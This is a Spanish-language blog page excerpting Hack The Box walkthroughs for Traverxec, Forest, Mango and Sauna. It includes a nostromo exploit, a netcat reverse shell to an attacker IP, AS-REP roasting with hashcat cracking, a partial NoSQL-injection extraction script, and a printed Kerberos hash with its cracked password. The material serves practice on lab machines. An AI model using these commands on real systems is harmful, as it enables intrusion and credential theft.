Encontrando el user Todo empezó con un con una enumeración básica, y se determinó que la máquina Traverxec tiene abierto dos puertos. El 22 (ssh) y el 80 (http), de acuerdo a la salida de nmap, se puede ver que el puerto 80 tiene el servicio de http de nostromo en su versión 1.9.6. <service name=»http» product=»nostromo» version=»1.9.6″ Con esa información y con este enlace se estableció una shell reversa. https://github.com/jas502n/CVE-2019-16278 ./CVE-2019-16278.sh traverxec.htb 80 nc -nv 10.10.14.3 4444 -c bash Nostromo, permite a los usuarios tener páginas personales, por lo que revisando «david/public_www/protected-file-area», se pudo encontrar una la id_rsa en…

Nmap a forest.htb de la manera convencional. Enumerar usuarios como indica aquí. https://www.tarlogic.com/blog/como-atacar-kerberos/ O con el módulo smb-enum de metasploit. Con el resultado de nombres de usuario se elaboró el archivo username.txt. Se encontró el usuario svc-alfresco y se pudo determinar el hash de la credencial con el comando python GetNPUsers.py htb.local/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast Una vez obtenido el hash de svc-alfresco. Con el uso de hashcat y Rockyou.txt se determinó que la clave de svc-alfresco es «s3rvice» Se obtuvo la shell en el servidor con el comando: evil-winrm -i forest.htb -u svc-alfresco -p ‘s3rvice’ Y en…

Mango = MongoDB Revisar los certificados SSL y encontrar el nombre del host adecuado: https://staging-order.mango.htb Revisar el link https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection Elaborar un script para explotar NoSQLi #!/usr/bin/env python   import requests   import string   url = «http://staging-order.mango.htb/index.php»   headers = {«Host»: «staging-order.mango.htb»}   cookies = {«PHPSESSID»: «9k6j39np56td4vq3q4lg4eh95j»}   possible_chars = list(string.ascii_letters) + list(string.digits) + [«\\»+c for c in string.punctuation+string.whitespace ]   def get_password(username):       print(«Extracting password of » + username)       params = {«username»:username, «password[$regex]»:»», «login»: «login»}       password = «^»       while True:           for c in…

Resumen Aprovechando que la página contenía información del staff de trabajadores se pudo generar una lista de usuarios válidos, con esto se obtuvo un acceso sin privilegios elevados, sin embargo tenía un soporte legacy esto permitió usar la repetición NTLM (ntlmrelay) se pudo obtener credenciales privilegiadas. Punto de Apoyo Enumeramos de manera convencional Ver la página y escribir los nombres del equipo en un archivo txt. Usar este script para generar posibles usuarios del active directory. https://github.com/Sh4rpe/UNCreator/blob/master/README.md Obtener Usuario GetNPUsers.py EGOTISTICALBANK/ -usersfile ../../../hackthebox/sauna/users.txt  -no-pass -dc-ip sauna.htb -format hashcat -outputfile fsmith.hash hashcat -m 18200 –force -a 0 fsmith.hash ../../wordlist/rockyou.txt  $krb5asrep$23$FSmith@EGOTISTICALBANK:0bd43c2e6f733ab7df687d0e70dc037b$ebd9c1d21a76485fa5419ff349cb692699b4cc1700dfd60efdd34d2c224f7d9194a46c377ce9d9492f66426d995783e3b49c2fc857bdc278be0eb150295b767ccaaa560833b4caee4486529467a76a39b5d749cbb5a64fd63cfc67269bea4bea8f44e5fcfe3b6d615d5ff36bc378b29fc99d5f389899f0818ef145a17f8a2ba93962b07269dc3e865da6555b3a435573f96800fd80435adb5acc13748addc4270bd14389ac09bba0a5e5057e221800ae10a32723e415b8d756f99e492fbe68efe0c1d620a06af8b71364ff2eda84875daf5e5c2e809bc44e5c1298f7628f0faeb7b257d5feba44cd68f667e55169f801fc12ef01f0c3a5e7b4:Thestrokes23 evil-winrm…